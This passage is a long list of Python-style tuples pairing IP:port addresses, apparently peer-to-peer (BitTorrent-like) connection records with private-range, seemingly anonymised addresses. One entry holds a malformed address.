('172.16.31.10:6881', '172.16.17.32:60439'),
('172.16.31.10:6881', '192.168.127.12:13973'),
('172.16.31.10:6881', '172.16.31.10:8888'),
('172.16.31.10:6881', '172.16.17.32:27032'),
('172.16.31.10:6881', '192.168.127.12:36485'),
('172.16.31.10:6881', '192.168.3.11:17109'),
('172.16.31.10:6881', '192.168.127.12:50765'),
('172.16.31.10:6881', '172.16.31.10:7497'),
('172.16.31.10:6881', '192.168.127.12:10137'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '172.16.17.32:41650'),
('172.16.31.10:6881', '172.16.58.3:62797'),
('172.16.31.10:6881', '172.16.31.10:6890'),
('172.16.31.10:6881', '192.168.127.12:1024'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.3.11:25474'),
('172.16.31.10:6881', '172.16.58.3:40313'),
('172.16.31.10:6881', '172.16.31.10:17514'),
('172.16.31.10:6881', '172.16.58.3:20730'),
('172.16.31.10:6881', '192.168.127.12:14944'),
('172.16.31.10:6881', '192.168.127.12:29289'),
('172.16.31.10:6881', '172.16.17.32:21711'),
('172.16.31.10:6881', '172.16.58.3:20829'),
('172.16.31.10:6881', '172.16.17.32:20970'),
('172.16.31.10:6881', '172.16.58.3:16901'),
('172.16.31.10:6881', '192.168.3.11:8999'),
('172.16.31.10:6881', '172.16.17.32:53475'),
('172.16.31.10:6881', '172.16.58.3:11888'),
('172.16.31.10:6881', '172.16.58.3:6992'),
('172.16.31.10:6881', '192.168.127.12:50321'),
('172.16.31.10:6881', '172.16.58.3:27612'),
('172.16.31.10:6881', '192.168.3.11:15001'),
('172.16.31.10:6881', '172.16.17.32:22028'),
('172.16.31.10:6881', '192.168.127.12:26097'),
('172.16.31.10:6881', '172.16.58.3:47354'),
('172.16.31.10:6881', '172.16.58.3:36711'),
('172.16.31.10:6881', '172.16.31.10:6000'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.127.12:21941'),
('172.16.31.10:6881', '192.168.127.12:32021'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:34598'),
('172.16.31.10:6881', '172.16.31.10:45911'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.58.3:8841'),
('172.16.31.10:6881', '172.16.58.3:50321'),
('172.16.31.10:6881', '172.16.31.10:25226'),
('172.16.31.10:6881', '172.16.58.3:12887'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.3.11:15594'),
('172.16.31.10:6881', '192.168.127.12:1098'),
('172.16.31.10:6881', '172.16.17.32:21610'),
('172.16.31.10:6881', '172.16.31.10:6889'),
('172.16.31.10:6881', '172.16.58.3:47116'),
('172.16.31.10:6881', '192.168.3.11:1030'),
('172.16.31.10:6881', '192.168.3.11:42465'),
('172.16.31.10:6881', '192.168.127.12:25958'),
('172.16.31.10:6881', '192.168.3.11:20907'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.17.32:57545'),
('172.16.31.10:6881', '192.168.127.12:20131'),
('172.16.31.10:6881', '192.168.127.12:20151'),
('172.16.31.10:6881', '172.16.58.3:25250'),
('172.16.31.10:6881', '172.16.58.3:27920'),
('172.16.31.10:6881', '172.16.58.3:60388'),
('172.16.31.10:6881', '172.16.58.3:7680'),
('172.16.31.10:6881', '172.16.31.10:32115'),
('172.16.31.10:6881', '172.16.58.3:6882'),
('172.16.31.10:6881', '192.168.3.11:16707'),
('172.16.31.10:6881', '172.16.31.10:36632'),
('172.16.31.10:6881', '172.16.17.32:58202'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:2137'),
('172.16.31.10:6881', '172.16.31.10:8999'),
('172.16.31.10:6881', '192.168.127.12:40339'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '172.16.31.10:6935'),
('172.16.31.10:6881', '172.16.31.10:6938'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.127.12:6884'),
('172.16.31.10:6881', '172.16.17.32:54805'),
('172.16.31.10:6881', '192.168.3.11:50242'),
('172.16.31.10:6881', '192.168.3.11:60909'),
('172.16.31.10:6881', '172.16.17.32:44728'),
('172.16.31.10:6881', '172.16.31.10:48818'),
('172.16.31.10:6881', '192.168.3.11:54854'),
('172.16.31.10:6881', '192.168.127.12:54208'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.3.11:25123'),
('172.16.31.10:6881', '192.168.3.11:7978'),
('172.16.31.10:6881', '172.16.58.3:20879'),
('172.16.31.10:6881', '192.168.3.11:38448'),
('172.16.31.10:6881', '192.168.127.12:24355'),
('172.16.31.10:6881', '172.16.17.32:61097'),
('172.16.31.10:6881', '172.16.17.32:13056'),
('172.16.31.10:6881', '172.16.17.32:47359'),
('172.16.31.10:6881', '172.16.17.32:62412'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.3.11:19217'),
('172.16.31.10:6881', '172.16.17.32:49001'),
('172.16.31.10:6881', '192.168.127.12:19364'),
('172.16.31.10:6881', '192.168.127.12:20665'),
('172.16.31.10:6881', '192.168.127.12:23639'),
('172.16.31.10:6881', '192.168.127.12:26940'),
('172.16.31.10:6881', '192.168.127.12:30809'),
('172.16.31.10:6881', '172.16.31.10:47783'),
('172.16.31.10:6881', '192.168.3.11:51413'),
('172.16.31.10:6881', '172.16.31.10:6882'),
('172.16.31.10:6881', '172.16.31.10:6884'),
('172.16.31.10:6881', '172.16.31.10:6885'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.3.11:51413'),
('172.16.31.10:6881', '192.168.127.12:24554'),
('172.16.31.10:6881', '192.168.127.12:14855'),
('172.16.31.10:6881', '192.168.3.11:3292'),
('172.16.31.10:6881', '192.168.3.11:64494'),
('172.16.31.10:6881', '192.168.127.12:59679'),
('172.16.31.10:6881', '172.16.17.32:13533'),
('172.16.31.10:6881', '172.16.17.32:22866'),
('172.16.31.10:6881', '172.16.17.32:24688'),
('172.16.31.10:6881', '172.16.17.32:31038'),
('172.16.31.10:6881', '172.16.17.32:32976'),
('172.16.31.10:6881', '172.16.17.32:35267'),
('172.16.31.10:6881', '172.16.17.32:36818'),
('172.16.31.10:6881', '172.16.17.32:38249'),
('172.16.31.10:6881', '172.16.17.32:40308'),
('172.16.31.10:6881', '172.16.17.32:46729'),
('172.16.31.10:6881', '172.16.17.32:52255'),
('172.16.31.10:6881', '172.16.17.32:54232'),
('172.16.31.10:6881', '172.16.17.32:6069'),
('172.16.31.10:6881', '172.16.17.32:61639'),
('172.16.31.10:6881', '172.16.17.32:63814'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.17.32:61963'),
('172.16.31.10:6881', '172.16.58.3:7449'),
('172.16.31.10:6881', '172.16.31.10:26952'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.3.11:22042'),
('172.16.31.10:6881', '172.16.17.32:20345'),
('172.16.31.10:6881', '172.16.17.32:6892'),
('172.16.31.10:6881', '172.16.17.32:6992'),
('172.16.31.10:6881', '172.16.58.3:26021'),
('172.16.31.10:6881', '192.168.3.11:35403'),
('172.16.31.10:6881', '192.168.3.11:9721'),
('172.16.31.10:6881', '172.16.31.10:28327'),
('172.16.31.10:6881', '192.168.127.12:51413'),
('172.16.31.10:6881', '172.16.58.3:38208'),
('172.16.31.10:6881', '172.16.58.3:26845'),
('172.16.31.10:6881', '172.16.58.3:54589'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.31.10:4432'),
('172.16.31.10:6881', '172.16.31.10:4432'),
('172.16.31.10:6881', '172.16.58.3:9849'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.58.3:11319'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:13310'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.127.12:10241'),
('172.16.31.10:6881', '172.16.31.10:18359'),
('172.16.31.10:6881', '172.16.17.32:28070'),
('172.16.31.10:6881', '172.16.31.10:17502'),
('172.16.31.10:6881', '172.16.31.10:56459'),
('172.16.31.10:6881', '192.168.127.12:53126'),
('172.16.31.10:6881', '172.16.58.3:27448'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.31.10:33655'),
('172.16.31.10:6881', '192.168.3.11:46392'),
('172.16.31.10:6881', '192.168.3.11:22089'),
('172.16.31.10:6881', '172.16.58.3:39258'),
('172.16.31.10:6881', '172.16.31.10:47071'),
('172.16.31.10:6881', '192.168.3.11:22502'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.58.3:55596'),
('172.16.31.10:6881', '192.168.127.12:50321'),
('172.16.31.10:6881', '172.16.31.10:51413'),
('172.16.31.10:6881', '192.168.127.12:37321'),
('172.16.31.10:6881', '192.168.127.12:62348'),
('172.16.31.10:6881', '172.16.17.32:18446'),
('172.16.31.10:6881', '172.16.31.10:16457'),
('172.16.31.10:6881', '192.168.3.11:1837'),
('172.16.31.10:6881', '172.16.17.32:29966'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.58.3:6219'),
('172.16.31.10:6881', '172.16.58.3:11354'),
('172.16.31.10:6881', '172.16.58.3:16608'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.17.32:8621'),
('172.16.31.10:6881', '172.16.58.3:15808'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.3.11:53433'),
('172.16.31.10:6881', '172.16.17.32:1130'),
('172.16.31.10:6881', '192.168.3.11:31561'),
('172.16.31.10:6881', '192.168.3.11:56976'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:22181'),
('172.16.31.10:6881', '192.168.3.11:64952'),
('172.16.31.10:6881', '172.16.17.32:13840'),
('172.16.31.10:6881', '172.16.17.32:50714'),
('172.16.31.10:6881', '172.16.17.32:7973'),
('172.16.31.10:6881', '172.16.17.32:8038'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.127.12:7981'),
('172.16.31.10:6881', '192.168.3.11:62560'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '172.16.58.3:9785'),
('172.16.31.10:6881', '172.16.17.32:26559'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.31.10:50321'),
('172.16.31.10:6881', '172.16.17.32:6888'),
('172.16.31.10:6881', '172.16.17.32:33333'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.3.11:28824'),
('172.16.31.10:6881', '192.168.3.11:60295'),
('172.16.31.10:6881', '172.16.58.3:8652'),
('172.16.31.10:6881', '192.168.3.11:40578'),
('172.16.31.10:6881', '172.16.58.3:13144'),
('172.16.31.10:6881', '172.16.17.3211:54769'),
('172.16.31.10:6881', '172.16.58.3:13571'),
('172.16.31.10:6881', '172.16.58.3:3131'),
('172.16.31.10:6881', '172.16.58.3:19847'),
('172.16.31.10:6881', '192.168.3.11:9090'),
('172.16.31.10:6881', '172.16.58.3:1530'),
('172.16.31.10:6881', '192.168.3.11:42825'),
('172.16.31.10:6881', '172.16.58.3:6889'),
('172.16.31.10:6881', '172.16.31.10:16753'),
('172.16.31.10:6881', '172.16.58.3:49869'),
('172.16.31.10:6881', '172.16.58.3:49879'),
('172.16.31.10:6881', '172.16.31.10:3640'),
('172.16.31.10:6881', '192.168.3.11:33123'),
('172.16.31.10:6881', '172.16.17.32:40916'),
('172.16.31.10:6881', '172.16.17.32:60629'),
('172.16.31.10:6881', '172.16.17.32:48577'),
('172.16.31.10:6881', '172.16.58.3:33474'),
('172.16.31.10:6881', '172.16.58.3:3848'),
('172.16.31.10:6881', '192.168.3.11:41161'),
('172.16.31.10:6881', '172.16.17.32:29021'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.17.32:60052'),
('172.16.31.10:6881', '172.16.31.10:10391'),
('172.16.31.10:6881', '192.168.127.12:45620'),
('172.16.31.10:6881', '192.168.3.11:48791'),
('172.16.31.10:6881', '172.16.31.10:6889'),
('172.16.31.10:6881', '172.16.58.3:57688'),
('172.16.31.10:6881', '192.168.127.12:41074'),
('172.16.31.10:6881', '192.168.127.12:40971'),
('172.16.31.10:6881', '172.16.31.10:23022'),
('172.16.31.10:6881', '192.168.3.11:12052'),
('172.16.31.10:6881', '192.168.3.11:40795'),
('172.16.31.10:6881', '172.16.58.3:59435'),
('172.16.31.10:6881', '172.16.58.3:10294'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:50321'),
('172.16.31.10:6881', '172.16.58.3:11295'),
('172.16.31.10:6881', '192.168.3.11:3331'),
('172.16.31.10:6881', '192.168.127.12:6894'),
('172.16.31.10:6881', '172.16.17.32:30368'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.127.12:63489'),
('172.16.31.10:6881', '172.16.31.10:6892'),
('172.16.31.10:6881', '172.16.31.10:6992'),
('172.16.31.10:6881', '192.168.127.12:9500'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.127.12:16872'),
('172.16.31.10:6881', '192.168.127.12:15057'),
('172.16.31.10:6881', '172.16.31.10:28835'),
('172.16.31.10:6881', '172.16.31.10:50701'),
('172.16.31.10:6881', '192.168.3.11:1131'),
('172.16.31.10:6881', '192.168.127.12:9610'),
('172.16.31.10:6881', '192.168.3.11:25026'),
('172.16.31.10:6881', '172.16.31.10:51413'),
('172.16.31.10:6881', '192.168.127.12:15064'),
('172.16.31.10:6881', '172.16.17.32:51413'),
('172.16.31.10:6881', '192.168.127.12:34407'),
('172.16.31.10:6881', '172.16.17.32:61609'),
('172.16.31.10:6881', '172.16.58.3:7293'),
('172.16.31.10:6881', '172.16.31.10:52256'),
('172.16.31.10:6881', '172.16.17.32:19993'),
('172.16.31.10:6881', '192.168.3.11:45319'),
('172.16.31.10:6881', '172.16.17.32:49063'),
('172.16.31.10:6881', '192.168.3.11:45834'),
('172.16.31.10:6881', '192.168.3.11:52607'),
('172.16.31.10:6881', '192.168.127.12:46441'),
('172.16.31.10:6881', '192.168.3.11:44399'),
('172.16.31.10:6881', '172.16.17.32:17968'),
('172.16.31.10:6881', '192.168.3.11:43849'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.3.11:47778'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.127.12:51442'),
('172.16.31.10:6881', '192.168.127.12:41454'),
('172.16.31.10:6881', '172.16.31.10:50321'),
('172.16.31.10:6881', '172.16.58.3:44822'),
('172.16.31.10:6881', '172.16.31.10:61687'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.3.11:44137'),
('172.16.31.10:6881', '172.16.17.32:57053'),
('172.16.31.10:6881', '172.16.17.32:60680'),
('172.16.31.10:6881', '192.168.3.11:6889'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.17.32:9090'),
('172.16.31.10:6881', '172.16.17.32:9091'),
('172.16.31.10:6881', '172.16.58.3:57120'),
('172.16.31.10:6881', '192.168.3.11:7777'),
('172.16.31.10:6881', '192.168.3.11:8887'),
('172.16.31.10:6881', '192.168.3.11:8888'),
('172.16.31.10:6881', '172.16.17.32:7776'),
('172.16.31.10:6881', '172.16.17.32:8887'),
('172.16.31.10:6881', '172.16.17.32:9999'),
('172.16.31.10:6881', '172.16.31.10:7777'),
('172.16.31.10:6881', '172.16.31.10:8888'),
('172.16.31.10:6881', '172.16.31.10:9999'),
('172.16.31.10:6881', '192.168.3.11:22378'),
('172.16.31.10:6881', '172.16.31.10:9051'),
('172.16.31.10:6881', '192.168.127.12:13840'),
('172.16.31.10:6881', '192.168.127.12:31386'),
('172.16.31.10:6881', '192.168.127.12:51465'),
('172.16.31.10:6881', '192.168.3.11:14835'),
('172.16.31.10:6881', '192.168.127.12:7788'),
('172.16.31.10:6881', '192.168.127.12:60659'),
('172.16.31.10:6881', '192.168.3.11:51553'),
('172.16.31.10:6881', '192.168.127.12:50321'),
('172.16.31.10:6881', '172.16.17.32:13247'),
('172.16.31.10:6881', '192.168.127.12:6889'),
('172.16.31.10:6881', '172.16.58.3:64879'),
('172.16.31.10:6881', '172.16.58.3:6892'),
('172.16.31.10:6881', '172.16.31.10:6892'),
('172.16.31.10:6881', '172.16.31.10:6992'),
('172.16.31.10:6881', '192.168.127.12:12766'),
('172.16.31.10:6881', '192.168.127.12:22046'),
('172.16.31.10:6881', '192.168.127.12:23291'),
('172.16.31.10:6881', '192.168.127.12:31528'),
('172.16.31.10:6881', '192.168.127.12:32188'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:28007'),
('172.16.31.10:6881', '172.16.31.10:6892'),
('172.16.31.10:6881', '172.16.31.10:6992'),
('172.16.31.10:6881', '192.168.127.12:29472'),
('172.16.31.10:6881', '172.16.17.32:11746'),
('172.16.31.10:6881', '192.168.127.12:27702'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:26748'),
('172.16.31.10:6881', '192.168.3.11:40564'),
('172.16.31.10:6881', '192.168.127.12:8699'),
('172.16.31.10:6881', '172.16.31.10:1087'),
('172.16.31.10:6881', '192.168.127.12:46762'),
('172.16.31.10:6881', '172.16.58.3:7299'),
('172.16.31.10:6881', '172.16.17.32:9573'),
('172.16.31.10:6881', '172.16.58.3:21980'),
('172.16.31.10:6881', '172.16.17.32:18251'),
('172.16.31.10:6881', '192.168.3.11:17154'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:55051'),
('172.16.31.10:6881', '192.168.127.12:49547'),
('172.16.31.10:6881', '172.16.17.32:55091'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.58.3:43896'),
('172.16.31.10:6881', '172.16.58.3:32537'),
('172.16.31.10:6881', '192.168.127.12:57275'),
('172.16.31.10:6881', '172.16.31.10:33719'),
('172.16.31.10:6881', '172.16.58.3:23194'),
('172.16.31.10:6881', '172.16.17.32:58485'),
('172.16.31.10:6881', '172.16.17.32:10083'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '172.16.58.3:49272'),
('172.16.31.10:6881', '172.16.17.32:62348'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '172.16.17.32:30106'),
('172.16.31.10:6881', '172.16.31.10:44444'),
('172.16.31.10:6881', '192.168.127.12:33009'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '172.16.31.10:14041'),
('172.16.31.10:6881', '172.16.17.32:44974'),
('172.16.31.10:6881', '172.16.58.3:54292'),
('172.16.31.10:6881', '172.16.17.32:54998'),
('172.16.31.10:6881', '192.168.3.11:41242'),
('172.16.31.10:6881', '172.16.17.32:12844'),
('172.16.31.10:6881', '172.16.58.3:50321'),
('172.16.31.10:6881', '192.168.3.11:55259'),
('172.16.31.10:6881', '192.168.3.11:27159'),
('172.16.31.10:6881', '172.16.58.3:64176'),
('172.16.31.10:6881', '172.16.58.3:40500'),
('172.16.31.10:6881', '192.168.3.11:50321'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.3.11:35304'),
('172.16.31.10:6881', '172.16.17.32:16273'),
('172.16.31.10:6881', '172.16.31.10:7119'),
('172.16.31.10:6881', '192.168.127.12:1043'),
('172.16.31.10:6881', '172.16.31.10:22051'),
('172.16.31.10:6881', '172.16.17.32:12638'),
('172.16.31.10:6881', '192.168.3.11:48866'),
('172.16.31.10:6881', '192.168.127.12:42427'),
('172.16.31.10:6881', '172.16.31.10:35549'),
('172.16.31.10:6881', '172.16.17.32:23226'),
('172.16.31.10:6881', '172.16.31.10:3140'),
('172.16.31.10:6881', '192.168.127.12:18751'),
('172.16.31.10:6881', '192.168.127.12:54751'),
('172.16.31.10:6881', '192.168.3.11:8861'),
('172.16.31.10:6881', '172.16.31.10:32022'),
('172.16.31.10:6881', '192.168.127.12:21276'),
('172.16.31.10:6881', '172.16.17.32:48267'),
('172.16.31.10:6881', '192.168.3.11:51413'),
('172.16.31.10:6881', '172.16.31.10:17782'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '192.168.127.12:24577'),
('172.16.31.10:6881', '172.16.58.3:2831'),
('172.16.31.10:6881', '172.16.58.3:28778'),
('172.16.31.10:6881', '192.168.127.12:41418'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:39401'),
('172.16.31.10:6881', '192.168.127.12:47542'),
('172.16.31.10:6881', '192.168.127.12:26148'),
('172.16.31.10:6881', '192.168.3.11:43569'),
('172.16.31.10:6881', '172.16.58.3:20572'),
('172.16.31.10:6881', '172.16.58.3:54082'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.127.12:37101'),
('172.16.31.10:6881', '192.168.3.11:6882'),
('172.16.31.10:6881', '192.168.3.11:6883'),
('172.16.31.10:6881', '172.16.17.32:12696'),
('172.16.31.10:6881', '172.16.31.10:50321'),
('172.16.31.10:6881', '192.168.127.12:34106'),
('172.16.31.10:6881', '172.16.58.3:53384'),
('172.16.31.10:6881', '192.168.127.12:43591'),
('172.16.31.10:6881', '172.16.17.32:21402'),
('172.16.31.10:6881', '192.168.3.11:12119'),
('172.16.31.10:6881', '172.16.31.10:43552'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.17.32:44500'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.17.32:47821'),
('172.16.31.10:6881', '192.168.127.12:22866'),
('172.16.31.10:6881', '172.16.58.3:8999'),
('172.16.31.10:6881', '172.16.17.32:44238'),
('172.16.31.10:6881', '172.16.17.32:24227'),
('172.16.31.10:6881', '192.168.3.11:24678'),
('172.16.31.10:6881', '192.168.127.12:5120'),
('172.16.31.10:6881', '192.168.3.11:32866'),
('172.16.31.10:6881', '192.168.3.11:50321'),
('172.16.31.10:6881', '172.16.17.32:54622'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '192.168.127.12:6891'),
('172.16.31.10:6881', '172.16.58.3:53525'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '172.16.17.32:29103'),
('172.16.31.10:6881', '172.16.31.10:60000'),
('172.16.31.10:6881', '172.16.31.10:25910'),
('172.16.31.10:6881', '172.16.17.32:1025'),
('172.16.31.10:6881', '192.168.3.11:25436'),
('172.16.31.10:6881', '172.16.31.10:9350'),
('172.16.31.10:6881', '192.168.127.12:16336'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.127.12:26532'),
('172.16.31.10:6881', '192.168.3.11:50321'),
('172.16.31.10:6881', '172.16.58.3:6889'),
('172.16.31.10:6881', '172.16.58.3:64516'),
('172.16.31.10:6881', '172.16.17.32:14639'),
('172.16.31.10:6881', '192.168.3.11:10594'),
('172.16.31.10:6881', '192.168.127.12:48627'),
('172.16.31.10:6881', '192.168.3.11:17308'),
('172.16.31.10:6881', '192.168.127.12:24196'),
('172.16.31.10:6881', '192.168.127.12:6889'),
('172.16.31.10:6881', '192.168.127.12:6999'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:10269'),
('172.16.31.10:6881', '172.16.17.32:22837'),
('172.16.31.10:6881', '192.168.3.11:51652'),
('172.16.31.10:6881', '172.16.58.3:15969'),
('172.16.31.10:6881', '192.168.127.12:52971'),
('172.16.31.10:6881', '192.168.127.12:51413'),
('172.16.31.10:6881', '172.16.58.3:21011'),
('172.16.31.10:6881', '192.168.3.11:62864'),
('172.16.31.10:6881', '172.16.31.10:64879'),
('172.16.31.10:6881', '172.16.31.10:20347'),
('172.16.31.10:6881', '192.168.127.12:6889'),
('172.16.31.10:6881', '172.16.31.10:36635'),
('172.16.31.10:6881', '172.16.17.32:50411'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.3.11:6889'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '172.16.58.3:21011'),
('172.16.31.10:6881', '172.16.31.10:8649'),
('172.16.58.3:26888', '192.168.127.12:51413'),
('172.16.58.3:26888', '172.16.17.32:26746'),
('172.16.58.3:26888', '192.168.127.12:53302'),
('172.16.58.3:26888', '172.16.58.3:53793'),
('172.16.58.3:26888', '172.16.31.10:60202'),
('172.16.58.3:26888', '192.168.3.11:21942'),
('172.16.58.3:26888', '172.16.58.3:46445'),
('172.16.58.3:26888', '192.168.127.12:19765'),
('172.16.31.10:11049', '172.16.58.3:15128'),
('172.16.31.10:11049', '192.168.3.11:41063'),
('172.16.31.10:11049', '172.16.58.3:30322'),
('172.16.31.10:11049', '192.168.127.12:51413'),
('172.16.31.10:11049', '192.168.3.11:52138'),
('172.16.31.10:11049', '172.16.17.32:6889'),
('172.16.31.10:11049', '172.16.58.3:51413'),
('172.16.31.10:11049', '192.168.127.12:17404'),
('192.168.3.11:43459', '192.168.127.12:38438'),
('192.168.3.11:43459', '192.168.127.12:55120'),
('192.168.3.11:43459', '172.16.58.3:16264'),
('192.168.3.11:43459', '172.16.31.10:21173'),
('192.168.3.11:43459', '172.16.17.32:6881'),
('192.168.3.11:43459', '172.16.58.3:62958'),
('192.168.3.11:43459', '192.168.3.11:53362'),
('192.168.3.11:43459', '172.16.58.3:50931'),
('192.168.127.12:6895', '172.16.58.3:6881'),
('192.168.127.12:6895', '192.168.3.11:9092'),
('192.168.127.12:6895', '172.16.17.32:35071'),
('192.168.127.12:6895', '192.168.3.11:57670'),
('192.168.127.12:6895', '172.16.31.10:6881'),
('192.168.127.12:6895', '172.16.58.3:6881'),
('192.168.127.12:6895', '192.168.127.12:61588'),
('192.168.127.12:6895', '172.16.17.32:51413'),
('172.16.31.10:18763', '192.168.3.11:55619'),
('172.16.31.10:18763', '172.16.31.10:6898'),
('172.16.31.10:18763', '172.16.17.32:51415'),
('172.16.31.10:18763', '172.16.17.32:51486'),
('172.16.31.10:18763', '192.168.3.11:6881'),
('172.16.31.10:18763', '172.16.31.10:8621'),
('172.16.31.10:18763', '192.168.127.12:51440'),
('172.16.31.10:18763', '192.168.3.11:6881'),
('192.168.3.11:33298', '172.16.58.3:22889'),
('192.168.3.11:33298', '192.168.3.11:21942'),
('192.168.3.11:33298', '192.168.3.11:51413'),
('192.168.3.11:33298', '172.16.58.3:50321'),
('192.168.3.11:33298', '172.16.58.3:6881'),
('192.168.3.11:33298', '192.168.3.11:36468'),
('192.168.3.11:33298', '172.16.17.32:20711'),
('192.168.3.11:33298', '172.16.17.32:6881'),
('192.168.3.11:33298', '172.16.58.3:33971'),
('192.168.3.11:33298', '172.16.17.32:49160'),
('192.168.3.11:33298', '172.16.58.3:6881'),
('192.168.3.11:33298', '172.16.17.32:13715'),
('192.168.3.11:33298', '192.168.3.11:14098'),
('192.168.3.11:33298', '172.16.58.3:6881'),
('192.168.3.11:33298', '172.16.31.10:8999'),
('192.168.3.11:33298', '192.168.3.11:51413'),
('192.168.3.11:5343', '192.168.127.12:51413'),
('192.168.3.11:5343', '172.16.17.32:62408'),
('192.168.3.11:5343', '172.16.17.32:13159'),
('192.168.3.11:5343', '172.16.17.32:23800'),
('192.168.3.11:5343', '192.168.127.12:6881'),
('192.168.3.11:5343', '172.16.17.32:6881'),
('192.168.3.11:5343', '172.16.31.10:54817'),
('192.168.3.11:5343', '172.16.31.10:60871'),
('172.16.31.10:8441', '192.168.127.12:6881'),
('172.16.31.10:8441', '172.16.17.32:40640'),
('172.16.31.10:8441', '172.16.31.10:55186'),
('172.16.31.10:8441', '172.16.17.32:36269'),
('172.16.31.10:8441', '172.16.58.3:52111'),
('172.16.31.10:8441', '172.16.58.3:40500'),
('172.16.31.10:8441', '192.168.3.11:40538'),
('172.16.31.10:8441', '172.16.17.32:6881'),
('172.16.31.10:36161', '192.168.127.12:4370'),
('172.16.31.10:36161', '192.168.127.12:19771'),
